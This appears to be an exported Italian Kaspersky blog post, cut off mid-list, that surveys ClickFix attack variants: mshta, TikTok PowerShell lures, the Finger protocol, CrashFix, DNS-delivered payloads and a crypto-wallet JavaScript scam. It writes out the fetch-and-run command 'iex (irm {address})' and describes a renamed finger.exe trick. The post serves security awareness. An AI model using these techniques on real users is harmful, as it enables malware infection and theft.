{"id":30523,"date":"2026-03-13T12:01:44","date_gmt":"2026-03-13T10:01:44","guid":{"rendered":"https:\/\/www.kaspersky.it\/blog\/?p=30523"},"modified":"2026-03-13T14:00:15","modified_gmt":"2026-03-13T12:00:15","slug":"clickfix-attack-variations","status":"publish","type":"post","link":"https:\/\/www.kaspersky.it\/blog\/clickfix-attack-variations\/30523\/","title":{"rendered":"Variazioni di ClickFix"},"content":{"rendered":"

Circa un anno fa abbiamo pubblicato un post<\/a> sulla tecnica ClickFix, allora di tendenza. L\u2019essenza degli attacchi ClickFix si riduce al convincere la vittima, con pretesti vari, a eseguire un comando dannoso sul proprio computer. Dal punto di vista delle soluzioni di sicurezza informatica, l\u2019attacco viene eseguito per conto dell\u2019utente attivo e con i relativi privilegi.<\/p>\n

Nei primi impieghi di questa tecnica i criminali informatici cercavano di convincere le vittime della necessit\u00e0 di eseguire un comando per correggere qualche problema o superare un captcha<\/a> e, nella stragrande maggioranza dei casi, il comando dannoso era uno script di PowerShell. Da allora, tuttavia, gli autori degli attacchi hanno escogitato una serie di nuovi trucchi di cui gli utenti dovrebbero essere avvertiti, nonch\u00e9 una serie di nuove varianti di erogazione di payload dannosi che vale la pena tenere d\u2019occhio.<\/p>\n

Uso di mshta.exe<\/em><\/h2>\n

L\u2019anno scorso Microsoft ha pubblicato un rapporto<\/a> sugli attacchi informatici contro gli albergatori che operavano con Booking.com. Gli autori degli attacchi inviavano notifiche false dal servizio oppure e-mail falsamente provenienti da ospiti interessati a una recensione. In entrambi i casi, l\u2019e-mail conteneva un collegamento a un sito Web clone di Booking.com che chiedeva alla vittima di eseguire un codice tramite il menu Esegui per dimostrare di non essere un robot.<\/p>\n

Vi sono due differenze fondamentali tra questo attacco e ClickFix. Innanzitutto, qui all\u2019utente non viene chiesto di copiare la stringa (dopotutto, una stringa contenente codice pu\u00f2 destare sospetti). La stringa viene invece copiata nel buffer dal sito dannoso, probabilmente quando l\u2019utente fa clic su una casella di controllo che imita il meccanismo reCAPTCHA. In secondo luogo, la stringa dannosa chiama l\u2019utilit\u00e0 legittima mshta.exe<\/em>, che consente di eseguire applicazioni scritte in HTML. Poi contatta il server degli autori degli attacchi ed esegue il carico utile dannoso.<\/p>\n

Video in TikTok e PowerShell con privilegi di amministratore<\/h2>\n

BleepingComputer ha pubblicato un articolo<\/a> nell\u2019ottobre 2025 su una campagna che diffondeva malware tramite istruzioni nei video di TikTok. I video stessi erano imitazioni di tutorial su come attivare gratuitamente software proprietario. Le istruzioni si riducevano alla necessit\u00e0 di eseguire PowerShell con diritti di amministratore, quindi di eseguire il comando iex (irm {address})<\/em>. Qui il comando irm scaricava uno script dannoso da un server controllato da utenti malintenzionati e il comando iex<\/em> (Invoke-Expression) lo eseguiva. Lo script, a sua volta, scaricava un malware infostealer nel computer della vittima.<\/p>\n

Uso del protocollo Finger<\/h2>\n

Un\u2019altra variante insolita dell\u2019attacco ClickFix sfrutta<\/a> il noto trucco captcha, ma lo script dannoso usa il protocollo Finger<\/a> oggi obsoleto. L\u2019omonima utilit\u00e0 consente a chiunque di richiedere dati su un utente specifico su un server remoto. Oggi il protocollo viene utilizzato raramente, ma \u00e8 ancora supportato da Windows, macOS e diversi sistemi basati su Linux.<\/p>\n

L\u2019utente viene convinto ad aprire l\u2019interfaccia della riga di comando per eseguire un comando che stabilisce una connessione al server degli aggressori tramite il protocollo Finger (usando la porta TCP 79). Il protocollo trasferisce solo informazioni testuali, ma \u00e8 sufficiente per scaricare un altro script nel computer della vittima, che proceder\u00e0 a installare il malware.<\/p>\n

Variante CrashFix<\/h2>\n

Un\u2019altra variante di ClickFix si differenzia per l\u2019utilizzo di tecniche di social engineering pi\u00f9 sofisticate. \u00c8 stata vista in un attacco<\/a> mirato a utenti in cerca di uno strumento per bloccare banner pubblicitari, tracker, malware e altri contenuti indesiderati nelle pagine Web. Durante la ricerca di un\u2019estensione per Google Chrome, le vittime trovavano un\u2019estensione chiamata NexShield \u2013 Advanced Web Guardian<\/em>, che in realt\u00e0 era un clone di un software legittimo, ma che a un certo punto arrestava il browser e visualizzava una notifica falsa relativa a un problema di sicurezza e la necessit\u00e0 di eseguire una \u201cscansione\u201d per correggerlo. Se l\u2019utente accettava, riceveva istruzioni su come aprire il menu Esegui ed eseguire un comando che l\u2019estensione aveva precedentemente copiato negli Appunti.<\/p>\n

Il comando copiava il familiare file finger.exe<\/em> in una directory temporanea, lo rinominava ct.exe<\/em> e quindi lo avviava con l\u2019indirizzo dell\u2019utente malintenzionato. Il resto dell\u2019attacco proseguiva come gi\u00e0 descritto sopra. In risposta alla richiesta del protocollo Finger veniva recapitato uno script dannoso che avviava e installava un trojan di accesso remoto (in questo caso ModeloRAT).<\/p>\n

Invio di malware tramite DNS lookup<\/h2>\n

Il team di Microsoft Threat Intelligence ha inoltre condiviso<\/a> una variante di attacco ClickFix leggermente pi\u00f9 complessa del solito. Sfortunatamente, non ha fornito alcuna descrizione della componente di social engineering, ma il metodo per distribuire il carico utile dannoso \u00e8 piuttosto interessante. Probabilmente per complicare il rilevamento dell\u2019attacco in un ambiente aziendale e prolungare la vita dell\u2019infrastruttura dannosa, gli autori degli attacchi aggiungevano un passaggio: contattare un server DNS controllato da loro stessi.<\/p>\n

In altre parole, dopo che la vittima veniva in qualche modo persuasa a copiare ed eseguire un comando dannoso, una richiesta veniva inviata al server DNS per conto dell\u2019utente tramite la legittima utilit\u00e0 nslookup<\/em>, richiedendo dati per il dominio example.com<\/em>. Il comando conteneva l\u2019indirizzo di un server DNS specifico controllato dagli autori degli attacchi. Restituiva una risposta che, tra le altre cose, restituiva a sua volta una stringa contenente script dannoso, la quale scaricava il carico utile finale (in questo attacco, di nuovo ModeloRAT).<\/p>\n

Esca di criptovaluta e JavaScript come carico utile<\/h2>\n

La successiva variante di attacco<\/a> \u00e8 interessante per il suo modello di social engineering a pi\u00f9 stadi. Nei commenti su Pastebin, gli aggressori avevano attivamente diffuso un messaggio in merito a un presunto difetto nell\u2019exchange di criptovalute Swapzone.io<\/em>. I proprietari di criptovalute venivano invitati a visitare una risorsa creata dai truffatori contenente istruzioni complete su come sfruttare questa falla, capace di generare fino a 13.000 dollari in un paio di giorni.<\/p>\n

Le istruzioni spiegavano come sfruttare i difetti del servizio per scambiare criptovalute a tassi pi\u00f9 favorevoli. A tale scopo, la vittima doveva aprire il sito Web del servizio nel browser Chrome, digitare \u201cjavascript:\u201d nella barra degli indirizzi, quindi incollare lo script JavaScript copiato dal sito Web degli autori degli attacchi ed eseguirlo. In realt\u00e0, ovviamente, lo script non incideva in alcun modo sui tassi di cambio ma sostituiva semplicemente gli indirizzi dei wallet Bitcoin e, se la vittima avesse effettivamente tentato di scambiare qualcosa, avrebbe trasferito i fondi sui conti degli autori degli attacchi.<\/p>\n

Come proteggere l\u2019azienda dai truffatori<\/h2>\n

Gli attacchi pi\u00f9 semplici che utilizzano la tecnica ClickFix possono essere contrastati inibendo la combinazione di tasti [Win] <\/strong>+ [R] <\/strong>sui dispositivi di lavoro. Tuttavia, come si vede dagli esempi elencati, non rappreseno affatto l\u2019unico tipo di attacco in cui agli utenti viene richiesto di eseguire essi stessi codice dannoso.<\/p>\n

Pertanto, il consiglio principale \u00e8 di sensibilizzare i dipendenti alla sicurezza informatica. Devono capire chiaramente che se qualcuno chiede loro di eseguire manipolazioni insolite al sistema e\/o di copiare codice e incollarlo da qualche parte, nella maggior parte dei casi si tratta di un trucco. La formazione sulla sensibilizzazione alla sicurezza pu\u00f2 essere organizzata con Kaspersky Automated Security Awareness Platform<\/a>.<\/p>\n

Inoltre, per proteggersi da tali attacchi informatici, \u00e8 consigliabile:<\/p>\n